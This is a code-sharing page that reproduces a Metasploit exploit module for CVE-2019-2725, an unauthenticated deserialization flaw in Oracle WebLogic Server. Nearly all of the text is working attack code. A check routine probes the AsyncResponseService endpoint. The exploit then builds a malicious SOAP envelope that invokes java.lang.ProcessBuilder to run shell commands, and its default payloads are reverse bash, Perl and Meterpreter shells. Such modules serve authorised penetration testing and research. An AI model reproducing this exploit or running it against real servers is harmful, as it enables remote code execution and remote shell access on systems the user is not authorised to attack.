扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', 'Description' => %q{ An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. }, 'Author' => [ 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',# Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-2725'], ['CNVD-C', '2019-48814'], ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'], ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'] ], 'Privileged' => false, 'Platform' => %w{ unix win solaris }, 'Targets' => [ [ 'Unix', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'} ], [ 'Windows', 'Platform' => 'win', 'Arch' => [ARCH_X64, ARCH_X86], 'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'} ], [ 'Solaris', 'Platform' => 'solaris', 'Arch' => ARCH_CMD, 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}, 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'Compat'=> { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'WfsDelay' => 12 }, 'DisclosureDate' => 'Apr 23 2019')) register_options( [ Opt::RPORT(7001), OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]), OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService']) ] ) end def check res = send_request_cgi( 'uri'=> normalize_uri(datastore['WSPATH']), 'method' => 'POST', 'ctype'=> 'text/xml', 'headers'=> {'SOAPAction' => '' } ) if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>") vprint_status("The target returned a vulnerable HTTP code: /#{res.code}") vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}") Exploit::CheckCode::Vulnerable elsif res && res.code != 202 vprint_status("The target returned a non-vulnerable HTTP code") Exploit::CheckCode::Safe elsif res.nil? vprint_status("The target did not respond in an expected way") Exploit::CheckCode::Unknown else vprint_status("The target returned HTTP code: #{res.code}") vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]") Exploit::CheckCode::Unknown end end def exploit print_status("Generating payload...") case target.name when 'Windows' string0_cmd = 'cmd.exe' string1_param = '/c' shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false }) when 'Unix','Solaris' string0_cmd = '/bin/bash' string1_param = '-c' shell_payload = payload.encoded end random_action = rand_text_alphanumeric(20) random_relates = rand_text_alphanumeric(20) soap_payload =%Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"| soap_payload << %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"| soap_payload << %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">| soap_payload << %Q|<soapenv:Header>| soap_payload << %Q|<wsa:Action>#{random_action}</wsa:Action>| soap_payload << %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>| soap_payload << %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">| soap_payload << %Q|<void class="java.lang.ProcessBuilder">| soap_payload << %Q|<array class="java.lang.String" length="3">| soap_payload << %Q|<void index="0">| soap_payload << %Q|<string>#{string0_cmd}</string>| soap_payload << %Q|</void>| soap_payload << %Q|<void index="1">| soap_payload << %Q|<string>#{string1_param}</string>| soap_payload << %Q|</void>| soap_payload << %Q|<void index="2">| soap_payload << %Q|<string>#{shell_payload.encode(xml: :text)}</string>| #soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>| soap_payload << %Q|</void>| soap_payload << %Q|</array>| soap_payload << %Q|<void method="start"/>| soap_payload << %Q|</void>| soap_payload << %Q|</work:WorkContext>| soap_payload << %Q|</soapenv:Header>| soap_payload << %Q|<soapenv:Body>| soap_payload << %Q|<asy:onAsyncDelivery/>| soap_payload << %Q|</soapenv:Body>| soap_payload << %Q|</soapenv:Envelope>| uri = normalize_uri(datastore['WSPATH']) if uri.nil? datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/" end print_status("Sending payload...") begin res = send_request_cgi( 'uri'=> uri, 'method' => 'POST', 'ctype'=> 'text/xml', 'data' => soap_payload, 'headers'=> {'SOAPAction' => '' } ) rescue Errno::ENOTCONN fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.") end if res.nil? fail_with(Failure::Unreachable, "No response from host") elsif res && res.code != 202 fail_with(Failure::UnexpectedReply,"Exploit failed.Host did not responded with HTTP code #{res.code} instead of HTTP code 202") end end end |
体验盒子
